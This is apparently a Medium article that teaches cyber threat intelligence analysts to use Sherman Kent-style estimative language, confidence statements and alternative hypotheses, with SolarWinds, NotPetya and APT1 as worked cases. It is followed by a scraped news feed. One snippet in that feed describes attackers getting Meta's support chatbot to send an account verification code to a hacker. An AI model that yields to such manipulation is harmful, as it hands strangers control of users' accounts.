judgment.Use estimative language deliberately: Words such as “likely,” “probably,” “possible,” and “almost certainly” should communicate probability consistently rather than act as vague hedges.State confidence separately from probability: A judgment can be likely but low confidence if evidence is thin. A judgment can be high confidence but still not certain.Expose assumptions and alternatives: Analysts should test what else could explain the same evidence.Identify collection gaps: A good estimate says what is missing, not only what is believed.Preserve analytic integrity: Intelligence should be candid about uncertainty, source weakness, and dissent.This is not a mechanical checklist. It is a writing and reasoning discipline: structure the product so the reader can audit the analytic path.What Maps From Traditional Intelligence to CTI — And What Does NotTraditional national-security intelligence and CTI share the same analytic problem: decisions must be made before evidence is complete. Kent-style discipline maps well to CTI in several areas:Estimative language: CTI needs disciplined wording for attribution, intent, targeting, capability, and likelihood of future activity.Source access: CTI must distinguish endpoint telemetry, network logs, malware samples, sinkhole data, victim reporting, vendor clustering, government statements, and media summaries.Confidence: CTI must explain whether confidence comes from direct artifacts, multiple independent sources, long-term tracking, or inference.Alternative hypotheses: CTI must test whether shared infrastructure means same actor, whether victimology means deliberate targeting, and whether malware behavior proves intent.Collection gaps: CTI should turn uncertainty into hunt tasks, telemetry requirements, malware-analysis questions, and intelligence requirements.But not everything transfers cleanly:CTI evidence is often technical and perishable: Domains, infrastructure, certificates, hashes, and telemetry can age quickly.Vendor labels are not legal attribution: NOBELIUM, APT29, COZY BEAR, and other labels may overlap, but they are not automatically interchangeable.Visibility is uneven: One vendor may see endpoint telemetry, another may see cloud logs, and a government source may have classified access unavailable to public readers.Intent is harder than behavior: Malware execution, credential theft, and lateral movement can be documented technically. Strategic objective usually requires assessment.A CTI report needs a scoped question: This article is a tradecraft guide. A real CTI report would need a PIR, key judgments, actor or campaign scope, timeline, source base, indicators, affected victims or sectors, confidence per judgment, and defensive implications.1. Policy Relevance Without Policy CaptureKent argued for intelligence that mattered to national decisions. Relevance does not mean advocacy. In CTI terms, the analyst should understand the decision context — patch prioritization, detection engineering, executive risk, incident response, threat hunting, vendor exposure, or public communication — without forcing the evidence to support a preferred action.Example 1: Cuban Missile Crisis imagery supported decision-making without replacing policy judgmentClaim: October 1962 imagery narrowed uncertainty about Soviet offensive missile deployment in Cuba, but did not determine the U.S. policy response.Evidence: U.S. historical records describe a U-2 flight on October 14, 1962 and subsequent photo interpretation that identified Soviet MRBM sites under construction.Source access: Official historical records and archival imagery; reported in U.S. government records, not author-observed here.Assessment: This is a strong national-security example of policy-relevant intelligence: evidence clarified the threat, while the response remained a policy decision.Confidence in assessment: High.Confidence basis: Source access: official records and archival imagery; Source reliability: established; Information credibility: corroborated; Author verification: public records checked, original imagery not independently analyzed here.Sources: Office of the Historian, FRUS chronology; National Archives, Aerial Photograph of Missiles in Cuba.Qualifier / limitation: This is not a CTI case. It is used because the evidence-to-decision structure is directly relevant to CTI reporting.The CTI translation is straightforward: a malware sample, intrusion timeline, or cloud log can narrow uncertainty, but it does not automatically decide whether the organization should disclose publicly, isolate a business unit, attribute the incident, or notify regulators.Example 2: The 2007 Iran NIE decomposed a broad question into narrower judgmentsClaim: The 2007 Iran NIE separated several analytic questions — weaponization, enrichment, intent, and future capability — instead of treating “Iran’s nuclear program” as one indivisible judgment.Evidence: The declassified NIE uses differentiated judgments and confidence levels across related nuclear questions.Source access: Public declassified key judgments; reported by ODNI, not author-observed classified sourcing.Assessment: The product is a useful example of decomposing a broad question into narrower estimative judgments.Confidence in assessment: High for the decomposition claim; low for any claim about policy effect unless separately sourced.Confidence basis: Source access: declassified ODNI key judgments; Source reliability: established; Information credibility: primary public document; Author verification: public text checked, classified sourcing not available.Sources: ODNI, Iran: Nuclear Intentions and Capabilities; CIA CSI, 2007 NIE on Iran.Qualifier / limitation: This article does not assess whether the NIE changed policy. It only uses the public product to show disciplined decomposition of judgments.2. Facts, Assumptions, and JudgmentsKent-style analysis requires a visible boundary between what the analyst knows and what the analyst concludes. The most dangerous failures often occur when assumptions are written as if they are evidence.Example 1: Iraq WMD analysis shows the risk of assumption-driven certaintyClaim: The Iraq WMD case is a negative example of insufficiently disciplined separation between evidence, assumptions, and judgment.Evidence: The WMD Commission identified weak collection, analytic errors, and failure to make clear how much analysis rested on assumptions rather than strong evidence.Source access: Official retrospective commission reporting; reported, not author-observed original intelligence.Assessment: The Kent-style lesson is that historical behavior and concealment indicators should not be converted into current capability judgments without showing the inference chain.Confidence in assessment: High for the official finding of intelligence failure; moderate for the article’s specific “assumption-driven certainty” framing.Confidence basis: Source access: official retrospective commission reporting; Source reliability: established; Information credibility: corroborated for broad failure, interpreted for this article’s lesson framing; Author verification: public report checked, original intelligence not available.Sources: WMD Commission report index; WMD Commission transmittal letter; GPO WMD Commission PDF.Qualifier / limitation: The Iraq case is not a CTI case. It is included because it is a canonical warning about assumptions, source weakness, and overconfident estimates.Correct Kent-style wording would separate:Reported: Iraq had historical WMD programs and had previously concealed activity.Reported: sources and technical indicators were interpreted as suggesting renewed activity.Assumed: past concealment behavior implied possible continuing programs.Assessed: Iraq retained or reconstituted WMD capabilities.Collection gap: direct, reliable access to current program status was limited.The failure mode is converting “the regime has concealed WMD before” into “the regime currently has active WMD programs” without making the inferential jump visible enough.Example 2: SolarWinds analysis required separating technical fact from attribution judgmentClaim: SolarWinds reporting should distinguish technical supply-chain compromise from actor attribution and strategic intent.Evidence: CISA reported malicious code inserted into the SolarWinds software lifecycle; CrowdStrike analyzed SUNSPOT’s role in manipulating the build process.Source access: CISA-reported government advisory and CrowdStrike-reported technical analysis; not author-observed here.Assessment: The technical compromise, vendor cluster labels, government attribution, and intent assessment should be written as separate claims.Confidence in assessment: High.Confidence basis: Source access: government advisory and vendor technical analysis; Source reliability: established; Information credibility: corroborated for supply-chain compromise; Author verification: public reports checked, no independent reverse engineering here.Sources: CISA AA20–352A; CrowdStrike, SUNSPOT.Qualifier / limitation: Public reporting can support strong technical conclusions while still leaving parts of attribution and intent dependent on non-public evidence.Kent-style separation:Technical behavior: malicious Orion component inserted into build/update lifecycle.Tooling: SUNSPOT and SUNBURST.Vendor/government label: NOBELIUM, StellarParticle, APT29-style community labels depending on source.Attribution: assessed responsibility by governments or vendors.Intent: assessed intelligence collection or access objective.3. Estimative Probability LanguageKent’s “Words of Estimative Probability” addressed a persistent intelligence problem: analysts use words like “possible,” “probable,” and “likely,” but readers may assign different probabilities to the same words. This discipline does not require every estimate to become a math problem. It requires that probability language be intentional and consistent.Example 1: APT28 attribution should preserve source confidenceClaim: Public APT28 attribution language should preserve the source’s estimative wording.Evidence: The linked Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government and targeted information useful to government interests. Older or fuller Mandiant/FireEye reporting may use different confidence phrasing, so analysts should preserve the exact wording of the specific source they cite.Source access: Vendor reporting based on proprietary analysis; exact source base not fully available to public readers.Assessment: “The cited Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government” is stronger tradecraft than writing “APT28 is proven to be Russia.”Confidence in assessment: High for the wording recommendation; moderate for public evaluation of the underlying sponsorship claim.Confidence basis: Source access: vendor reporting based on proprietary analysis; Source reliability: established vendor; Information credibility: credible but not fully public; Author verification: linked blog wording checked, underlying evidence not independently verified.Source: Google Cloud / Mandiant, APT28.Qualifier / limitation: Vendor attribution can be credible without being fully independently auditable from public evidence.Kent-style wording:Better: “The cited Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government.”Weaker: “APT28 is Russian government-directed.”Worse: “APT28 is proven to be Russia.”The first version preserves the source, the estimative term, and the fact that the statement is an assessment.Example 2: 2007 Iran NIE showed probability and confidence in the same productClaim: The 2007 Iran NIE is a useful example of stating confidence levels across separate judgments.Evidence: The declassified NIE differentiates judgments about halted weaponization, enrichment, intent, and future decisions.Source access: Public declassified key judgments; original classified evidence not available here.Assessment: The product demonstrates why broad topics should be decomposed into narrower estimates with separate uncertainty.Confidence in assessment: High.Confidence basis: Source access: declassified ODNI key judgments; Source reliability: established; Information credibility: primary public document; Author verification: public text checked, classified sourcing not available.Source: ODNI, Iran NIE.Qualifier / limitation: Confidence language is not a guarantee of truth. It is a statement about evidentiary strength and analytic basis at the time of the estimate.4. Confidence Is Not ProbabilityProbability answers: “How likely is the judgment?” Confidence answers: “How strong is the basis for the judgment?” Analysts often blur these together. Kent-style discipline keeps them separate.Example 1: Iraq WMD showed that high-confidence judgments can still be wrongClaim: High confidence does not guarantee analytic accuracy if the source base and assumptions are weak.Evidence: Official retrospective reporting found major problems in prewar Iraq WMD assessments, including unsupported or overstated judgments.Source access: Official retrospective investigations and public reporting.Assessment: The case shows why confidence statements must identify source quality, access, corroboration, and assumption sensitivity.Confidence in assessment: High.Confidence basis: Source access: official retrospective investigations; Source reliability: established; Information credibility: corroborated for failure finding; Author verification: public reports checked, original intelligence not available.Sources: WMD Commission report; Senate Select Committee conclusions via GlobalSecurity mirror.Qualifier / limitation: This does not mean confidence language is useless. It means confidence must be earned and explained.Kent-style analysts should ask:What are the strongest sources?Which sources are single points of failure?What assumptions connect the evidence to the judgment?What reporting contradicts the judgment?What evidence would reduce confidence?Example 2: CTI malware behavior can be high confidence while intent remains moderate confidenceClaim: A CTI product can have high confidence in technical behavior and lower confidence in actor intent.Evidence: Mandiant reporting ties WannaCry to SMBv1/TCP 445 propagation and EternalBlue/MS17–010 exploitation. The U.S. Department of Justice later alleged that a North Korean regime-backed programmer connected to Lazarus Group activity participated in creating the malware used in the WannaCry 2.0 attack.Source access: Mandiant malware analysis reported technical behavior; DOJ charged/alleged DPRK-linked involvement and provided public attribution material; not author-observed here.Assessment: Analysts should assign separate confidence to malware behavior, actor clustering, government attribution, and intent. Government attribution does not remove the need to distinguish technical behavior from strategic motivation.Confidence in assessment: High.Confidence basis: Source access: Mandiant malware analysis and DOJ charging/public attribution material; Source reliability: established; Information credibility: high for SMB/MS17–010 behavior, established public government attribution exists, inferred for intent and internal tasking; Author verification: public reporting checked, no independent malware analysis here.Sources: Mandiant, WannaCry malware profile; Mandiant, WannaCry use of EternalBlue; DOJ, North Korean regime-backed programmer charged.Qualifier / limitation: This article does not independently adjudicate the DPRK/Lazarus attribution. It uses the case to show how post-attribution CTI should still separate behavior, attribution, and intent.5. Alternative HypothesesKent-style analysis does not require analysts to treat all hypotheses as equally plausible. It does require analysts to ask what else could explain the evidence and what collection would discriminate between explanations.Example 1: 9/11 warning failure showed the cost of narrow imaginationClaim: The 9/11 case illustrates why warning analysis needs alternative hypotheses before a threat becomes obvious in hindsight.Evidence: The 9/11 Commission identified failures of imagination, policy, capabilities, and management.Source access: Official retrospective commission reporting.Assessment: A warning product should test competing explanations for fragmentary indicators, including low-frequency but high-impact possibilities.Confidence in assessment: High for the broad warning lesson; moderate for any reconstructed pre-attack hypothesis set.Confidence basis: Source access: official retrospective commission reporting; Source reliability: established; Information credibility: corroborated for broad failure categories, illustrative for reconstructed hypotheses; Author verification: public report checked.Sources: 9/11 Commission Report PDF; Office of Justice Programs summary.Qualifier / limitation: Hindsight makes patterns look cleaner than they appeared at the time. The goal is humility and better warning structure, not retrospective certainty.Possible analytic frame before the attack:H1: Al-Qaida intended overseas attacks against U.S. interests.H2: Al-Qaida intended a major attack inside the United States.H3: Al-Qaida intended aviation-related operations, but the exact target and method were unknown.Discrimination: travel patterns, flight training, visa anomalies, financial movement, communications, and detainee reporting could have been evaluated as indicators across hypotheses.Example 2: NotPetya intent remains an assessed judgmentClaim: NotPetya’s destructive effect is easier to establish publicly than the operators’ internal intent.Evidence: Microsoft reported destructive behavior and enterprise spread; Cisco Talos reported M.E.Doc infrastructure manipulation connected to the outbreak. The UK and U.S. governments publicly attributed NotPetya to the Russian government or Russian military in February 2018, and DOJ later charged GRU Unit 74455 officers in connection with NotPetya and other destructive operations.Source access: Vendor technical analysis, incident reporting, and public government attribution statements.Assessment: Destructive effect should be reported separately from strategic intent even after public government attribution exists.Confidence in assessment: High for destructive effect; moderate for specific intent claims.Confidence basis: Source access: vendor technical reporting and government attribution statements; Source reliability: established; Information credibility: corroborated for destructive effect, public attribution strengthens actor context, internal intent remains inferred; Author verification: public reports checked, no original telemetry review.Sources: Microsoft, NotPetya technical analysis; Cisco Talos, The MeDoc Connection; UK Government, Foreign Office Minister condemns Russia for NotPetya; White House, Statement from the Press Secretary; DOJ, Six Russian GRU officers charged.Qualifier / limitation: Public attribution strengthens the actor context, but it still does not expose every internal objective, command decision, or intended propagation boundary.Alternative hypotheses:H1: NotPetya was designed as a destructive state operation using ransomware aesthetics as cover.H2: NotPetya was designed primarily for Ukraine-focused disruption but propagated more broadly than intended.H3: The ransomware presentation reflected mixed objectives or operational cover rather than a pure financial motive.The evidence strongly supports destructive effect. It does not publicly prove the internal decision process behind the operation.6. Warning, Indicators, and Collection GapsKent-style analysis is not only retrospective. It should produce warning questions and collection requirements. A judgment with no collection gap is often a judgment that has not been examined carefully enough.Example 1: Cuban Missile Crisis warning depended on collection timing and imagery interpretationClaim: The Cuban Missile Crisis shows how warning changes as collection improves.Evidence: Official records describe the October 14, 1962 U-2 mission, subsequent photo interpretation, and identification of MRBM sites under construction.Source access: Official records and imagery references.Assessment: Before imagery confirmation, the problem was warning under uncertainty; after imagery, the problem became site status, operational timeline, Soviet intent, and escalation risk.Confidence in assessment: High.Confidence basis: Source access: official records and imagery references; Source reliability: established; Information credibility: corroborated; Author verification: public records checked.Sources: Office of the Historian, FRUS chronology; DIA photo record.Qualifier / limitation: This is a national-security warning example, not a CTI intrusion case.Kent-style warning questions:What indicators would show offensive missile deployment rather than defensive military aid?What collection confirms construction status?What evidence distinguishes operational missiles from support equipment?What is the time horizon before the threat becomes operational?What assumptions could cause overreaction or underreaction?Example 2: SolarWinds exposed a collection gap in trusted software supply chainsClaim: SolarWinds showed that trusted software updates can create visibility gaps not solved by ordinary IOC matching.Evidence: CISA and CrowdStrike reporting describe malicious code inserted into a trusted software build and update process.Source access: Government advisory and vendor technical analysis.Assessment: The collection gap included build integrity, signed software provenance, vendor trust relationships, and anomalous post-update behavior.Confidence in assessment: High for the SolarWinds-specific gap; moderate for generalizing across all software supply-chain risk.Confidence basis: Source access: government advisory and vendor technical analysis; Source reliability: established; Information credibility: corroborated for SolarWinds compromise mechanism, inferred for broader supply-chain lessons; Author verification: public reports checked.Sources: CISA AA20–352A; CrowdStrike, SUNSPOT.Qualifier / limitation: A supply-chain compromise does not imply every similar vendor relationship is equally exposed.7. Analytic Integrity in CTICTI reporting often mixes telemetry, malware family names, vendor clusters, infrastructure, attribution, and intent. Analytic integrity means refusing to compress those into a single confident story unless the evidence supports it.Example 1: APT1 victimology supports targeting assessment, not observed reconnaissanceClaim: APT1 victimology supports a target-selection assessment, but does not directly prove specific reconnaissance methods.Evidence: Mandiant reported that APT1 compromised at least 141 organizations across many industries and tied the victimology to Chinese strategic priorities.Source access: Vendor incident response and technical reporting; public readers do not see the full underlying evidence.Assessment: Victimology supports deliberate campaign-level targeting, while individual intrusion reconnaissance remains a collection gap unless separate evidence exists.Confidence in assessment: Moderate.Confidence basis: Source access: vendor incident response reporting; Source reliability: established vendor; Information credibility: credible but limited public raw data; Author verification: public report checked, underlying case data not available.Source: Mandiant, APT1 report.Qualifier / limitation: Victimology alignment is not proof of tasking or pre-compromise research for each victim.Kent-style wording:Reported: APT1 compromised a large victim set across multiple sectors.Assessed by source: Victim sectors aligned with strategic economic and policy interests.Inferred by this article: The campaign likely involved deliberate target selection.Collection gap: The exact reconnaissance method before each intrusion is not directly shown by victimology alone.Example 2: SUNBURST, GoldMax, Sibot, and StellarParticle should not be flattened into one labelClaim: SolarWinds-related reporting requires careful separation of malware, tools, vendor clusters, campaign names, attribution, and intent.Evidence: Microsoft described GoldMax, GoldFinder, and Sibot as later-stage NOBELIUM tools; CrowdStrike used StellarParticle for related follow-on intrusion activity.Source access: Vendor technical analysis based on proprietary telemetry and incident response.Assessment: Treating SUNBURST, SUNSPOT, GoldMax, Sibot, NOBELIUM, StellarParticle, APT29, and COZY BEAR as interchangeable would collapse different analytic layers.Confidence in assessment: High.Confidence basis: Source access: vendor technical reporting; Source reliability: established vendors; Information credibility: credible and label-specific; Author verification: public reports checked, cross-vendor clustering not independently verified.Sources: Microsoft, GoldMax, GoldFinder, and Sibot; CrowdStrike, StellarParticle observations.Qualifier / limitation: Cross-vendor clustering may be valid, but it should be stated as an assessment with evidence, not assumed from name proximity.Kent-style separation:Malware/tool: SUNBURST, SUNSPOT, GoldMax, GoldFinder, Sibot.Vendor cluster: NOBELIUM, StellarParticle, APT29-style community labels.Campaign: SolarWinds-related intrusion activity.Attribution: assessed state-linked responsibility.Intent: intelligence collection, access development, or other objectives.Cognitive Biases CTI Analysts Should NameKent-style discipline is partly about fighting predictable analytic failure modes. The CIA tradecraft primer emphasizes structured techniques because analysts working with incomplete and ambiguous information are vulnerable to cognitive bias (CIA, A Tradecraft Primer).Common CTI bias patterns:Confirmation bias: treating every new domain, malware string, or infrastructure overlap as support for the actor hypothesis already in the analyst’s head.Anchoring: giving too much weight to the first vendor label or first incident-response theory, even after better evidence appears.Mirror imaging: assuming the adversary values risk, cost, publicity, or operational tempo the same way the defender does.Availability bias: over-weighting the most recent high-profile campaign because it is memorable, not because it best explains the evidence.Groupthink: converging on a shared attribution label because peer teams or trusted vendors use it, without separately testing the underlying evidence.Structured analytic techniques are useful because they force friction into the analysis. Alternative hypotheses, key assumptions checks, evidence matrices, and premortems are not bureaucratic decoration; they are bias controls. In CTI, the most practical bias check is simple: before publishing an attribution, write down the strongest evidence against it.Where ATT&CK and the Pyramid of Pain FitMITRE ATT&CK gives CTI teams a structured vocabulary for adversary tactics and techniques based on real-world observations (MITRE ATT&CK). The Pyramid of Pain, associated with David Bianco, explains why higher-level behavioral indicators and TTPs are usually harder for adversaries to change than hashes, IPs, and domains.Kent-style discipline does not replace these frameworks. It tells analysts how to write about them:Hash, IP, domain: usually source-observed or reported technical indicators; useful but often perishable and weak for attribution.Host or network artifact: stronger than a raw IOC when tied to execution context, but still may not identify an actor.ATT&CK technique: a behavioral claim. It should be mapped only when evidence supports the behavior, not because a malware family is commonly associated with the technique.Tool: stronger than a hash when supported by reverse engineering, but tool reuse and leaks can complicate attribution.TTP pattern: stronger for clustering when repeated across time, victims, infrastructure, and tooling.Actor attribution and intent: assessed judgments. ATT&CK mapping can support them, but does not prove them by itself.Example: “The intrusion used credential dumping” is a technique-level claim. “This was APT28” is an attribution claim. “The objective was strategic intelligence collection” is an intent claim. They need different evidence and different confidence statements.Kent-Style ChecklistUse this checklist before publishing an analytic judgment:Question: What decision or intelligence requirement does this answer?Claim: What exactly are you asserting?Evidence: What is source-observed, reported, assessed, or inferred?Source access: Did the source have telemetry, malware samples, logs, imagery, victim access, official records, or secondhand reporting?Source reliability: Is the source established, unknown, contested, or mixed?Information credibility: Is the information corroborated, single-source, inferred, or disputed?Author verification: What did you personally verify?Assumptions: What must be true for the judgment to hold?Probability: How likely is the judgment?Confidence: How strong is the evidence base?Alternatives: What else could explain the same evidence?Discrimination: What evidence would separate the hypotheses?Gaps: What do we still not know?Dissent: Are there credible disagreements or minority views?Change indicators: What would cause the assessment to change?Practical Analyst TemplateProduct title:Primary intelligence requirement:Decision context:Analyst:Date:Bottom line:- Assessment:- Probability language:- Confidence:- Scope and time horizon:Claim:- Exact claim:- What this claim does not say:Evidence base:- Author-observed:- Source-observed:- Reported:- Assessed by source:- Inferred by analyst:Source quality:- Source access:- Source reliability:- Information credibility:- Corroboration:- Author verification:Assumptions:- Assumption 1:- Assumption 2:- Assumption sensitivity:Alternative hypotheses:- H1 (primary):- H2 (alternative):- H3 (alternative, if needed):- Discriminating evidence:- Current preferred hypothesis and why:Confidence basis:- Collection strength:- Collection weakness:- Analytic uncertainty:- Dissent or caveats:Collection requirements:- Requirement 1:- Requirement 2:- Requirement 3:Indicators to watch:- Indicator that would increase confidence:- Indicator that would decrease confidence:- Indicator that would change the assessment:Defensive or policy implications:- Tactical:- Operational:- Strategic:ConclusionSherman Kent’s analytic legacy is not a historical curiosity. It is a practical discipline for writing intelligence under uncertainty. For CTI analysts, the lesson is especially important because cyber reporting routinely combines artifacts, telemetry, malware names, infrastructure links, vendor clusters, government statements, victimology, attribution, and intent.The real-world examples show why the discipline matters:Cuban Missile Crisis imagery shows policy-relevant intelligence narrowing uncertainty without replacing policy judgment.Iraq WMD analysis shows the danger of converting assumptions into confident conclusions.The 2007 Iran NIE shows the value of decomposing a broad issue into separate judgments with separate confidence levels.9/11 warning analysis shows why alternative hypotheses matter before a threat is obvious.SolarWinds shows why CTI must separate technical fact, tooling, vendor labels, attribution, and intent.APT1 victimology shows how to infer target selection without pretending to observe reconnaissance.NotPetya shows why destructive effect and strategic intent must be assessed separately.Used this way, Kent-style analytic discipline helps CTI analysts produce clearer estimates, better collection requirements, more defensible confidence statements, and fewer overclaims.ReferencesCIA, Sherman Kent, Words of Estimative Probability: https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/CIA, Words of Estimative Probability PDF: https://www.cia.gov/resources/csi/static/Words-of-Estimative-Probability.pdfCIA, The Intelligence Process: A Digest from Strategic Intelligence by Sherman Kent: https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3CIA, Sherman Kent and the Profession of Intelligence Analysis: https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdfODNI, Intelligence Community Directive 203: Analytic Standards: https://www.dni.gov/files/documents/ICD/ICD-203.pdfCIA, A Tradecraft Primer: Structured Analytic Techniques for Improving Intelligence Analysis: https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdfOffice of the Historian, Cuban Missile Crisis chronology and U-2 collection: https://history.state.gov/historicaldocuments/frus1961-63v11/d16National Archives, Aerial Photograph of Missiles in Cuba: https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cubaDIA, Cuban Missile Crisis U-2 photo record: https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/WMD Commission report index: https://govinfo.library.unt.edu/wmd/report/index.htmlWMD Commission report PDF: https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdfWMD Commission transmittal letter: https://govinfo.library.unt.edu/wmd/report/transmittal_letter.htmlSenate Select Committee conclusions on Iraq WMD intelligence via GlobalSecurity mirror: https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm9/11 Commission Report PDF: https://www.9-11commission.gov/report/911Report.pdfOffice of Justice Programs, 9/11 Commission Report summary: https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summaryODNI, Iran: Nuclear Intentions and Capabilities, 2007 NIE: https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdfCIA CSI, CIA Support to Policymakers: The 2007 NIE on Iran’s Nuclear Intentions and Capabilities: https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/Mandiant, APT1: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdfGoogle Cloud / Mandiant, APT28: https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operationsCISA, SolarWinds AA20–352A: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352aCrowdStrike, SUNSPOT: https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/Microsoft, GoldMax, GoldFinder, and Sibot: https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/CrowdStrike, StellarParticle observations: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/MITRE ATT&CK: https://attack.mitre.org/MITRE, MITRE ATT&CK overview: https://www.mitre.org/focus-areas/cybersecurity/mitre-attackSqrrl / David Bianco, A Framework for Cyber Threat Hunting Part 1: The Pyramid of Pain: https://www.threathunting.net/files/A%20Framework%20for%20Cyber%20Threat%20Hunting%20Part%201_%20The%20Pyramid%20of%20Pain%20_%20Sqrrl.pdfMandiant, WannaCry malware profile: https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profileMandiant, WannaCry use of EternalBlue: https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/DOJ, North Korean regime-backed programmer charged in cyber attacks including WannaCry 2.0: https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-andMicrosoft, NotPetya technical analysis: https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/Cisco Talos, The MeDoc Connection: https://blogs.cisco.com/security/talos/the-medoc-connectionUK Government, Foreign Office Minister condemns Russia for NotPetya attacks: https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacksWhite House, Statement from the Press Secretary on NotPetya: https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/DOJ, Six Russian GRU officers charged in connection with destructive malware including NotPetya: https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-andFollow for practical cybersecurity researchIf you’re interested in Offensive security, AI security, real-world attack simulations, CTI, and detection engineering — this is exactly what I focus on.Stay connected:→ Subscribe on Medium: medium.com/@1200km→ Connect on LinkedIn: andrey-pautov→ GitHub — tools & labs: github.com/anpa1200→ Contact: 1200km@gmail.comAndrey PautovApplying Sherman Kent’s Analytic Discipline to CTI: A Practical Analyst Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

hacker, hacking, security, hack, cybercrime, hacker, hacker, hacking, hacking, hack ...

Mon, 08 Jun 2026 02:06:29 +0200

hacker, hacking, security, hack, cybercrime, hacker, hacker, hacking, hacking, hack, cybercrime, cybercrime, cybercrime, cybercrime, cybercrime.

Anthropic warnt: KI-Systeme entwerfen eigene Nachfolger - Ad-hoc-news.de

Mon, 08 Jun 2026 03:22:26 +0200

... Hacking-Fähigkeiten. Interne Untersuchungen zeigen: Über 80 Prozent des ... Forscher präsentierten kürzlich einen KI-gesteuerten Computerwurm, der seine ...

KI-Warnung: Anthropic stoppt Mythos-Modell wegen Hacking-Risiken - Ad-hoc-news.de

Mon, 08 Jun 2026 05:45:34 +0200

Der Grund: Anthropic hat ein neues Modell namens Mythos entwickelt, das über erhebliche Hacking-Fähigkeiten verfügt. Anzeige. Während die Entwicklung ...

Syscoin pausiert Bridge nach Angriff: Hacker erzeugt fünf Milliarden unerlaubte SYS

Mon, 08 Jun 2026 05:49:16 +0200

Syscoin hat seine Bridge pausiert, nachdem ein Angreifer eine Validierungslücke ausnutzte und 5 Milliarden nicht genehmigte SYS prägte.

Silent Ransom Group: Hacker erbeuten 14 GB und fordern Millionen - Ad-hoc-news.de

Mon, 08 Jun 2026 04:18:25 +0200

Neue Gruppen erpressen Firmen mit gestohlenen Daten und Lösegeldforderungen. Hacker kapern Teams und Zoom für Millionen-Erpressung. Silent - A shadowy ...

KI-Phishing: 82,6% aller Betrugsmails werden künstlich generiert - Börse Express

Mon, 08 Jun 2026 03:42:03 +0200

Dieser kostenlose Report zeigt, welche psychologischen Tricks Hacker gezielt einsetzen, um Unternehmen zu schädigen. Gratis-Ratgeber zur Hacker-Abwehr ...

Russische Hacker: 73 GitHub-Repos von Microsoft kompromittiert - Ad-hoc-news.de

Mon, 08 Jun 2026 00:54:43 +0200

Russische Hacker: 73 GitHub-Repos von Microsoft kompromittiert. 08.06.2026 - 00:53:43 | boerse-global.de. Die Hackergruppe UAC-0001 attackiert ...

Erpresser-Welle: Hacker stehlen 300 Millionen Dollar über Teams - BornCity

Sun, 07 Jun 2026 23:10:03 +0200

Microsoft rüstet Teams mit Kerberos-Authentifizierung und KI-Schutz gegen eine Welle von Social-Engineering-Angriffen auf.

I drove with Apple CarPlay for over 25,000 miles last year - these apps were the most essential

Sun, 07 Jun 2026 21:49:00 +0200

I spend a lot of time driving. These are the CarPlay apps that make every ride easy.

Meta-Sicherheitslücke: Hacker kaperten 20.000 Instagram-Konten - Ad-hoc-news.de

Sun, 07 Jun 2026 20:50:45 +0200

Hacker nutzten KI-Chatbot von Meta aus, um Passwörter zurückzusetzen. Prominente Profile wie das Obama White House waren betroffen.

Nach Hacker-Angriff verliert Tierschützer Bruno Jelovic die Hälfte seiner Spenden - Blick

Sun, 07 Jun 2026 18:27:34 +0200

Mit seinem Instagram-Account «thegodfatherofdogs» sammelt Tierschützer Bruno Jelovic Spenden, um Hunde im Balkan zu retten.

Instagram-Hack per KI: Wie Angreifer Metas eigenen Support-Chatbot ausnutzten | t3n

Sun, 07 Jun 2026 16:34:38 +0200

Statt die Anfrage abzulehnen, willigte Metas KI ein und schickte einen Verifizierungscode an die E-Mail-Adresse des Hackers. Nachdem der Hacker den ...

Microsoft Office: Russische Hacker kapern Behördennetzwerke in EU - BornCity

Sun, 07 Jun 2026 19:45:01 +0200

... APT28. Hacker kapern Microsoft Office – Behörden in EU und Ukraine im Visier. Sicherheitsforscher haben eine massive Angriffswelle auf ...

Schmölln in Thüringen: Bushaltestellen-Bildschirm zeigt wohl plötzlich Pornografie - Spiegel

Sun, 07 Jun 2026 18:22:36 +0200

In Schmölln in Thüringen sollen obszöne Aufnahmen über einen Infomonitor an einer Bushaltestelle geflimmert sein. Die Polizei hat die Ermittlungen ...

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 100

Sun, 07 Jun 2026 17:38:25 +0200

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Malware Targeting WordPress Abuses Steam Community Profiles for Command & Control Operations Legitimate-Looking Codex Remote UI Secretly Steals Your AI Tokens Operation Dragon Weave : Uncovering a China-Linked Campaign Targeting Czech Republic and Taiwan […]

Politiker fordern nach Ruag-Hack konsequente Aufarbeitung - MSN

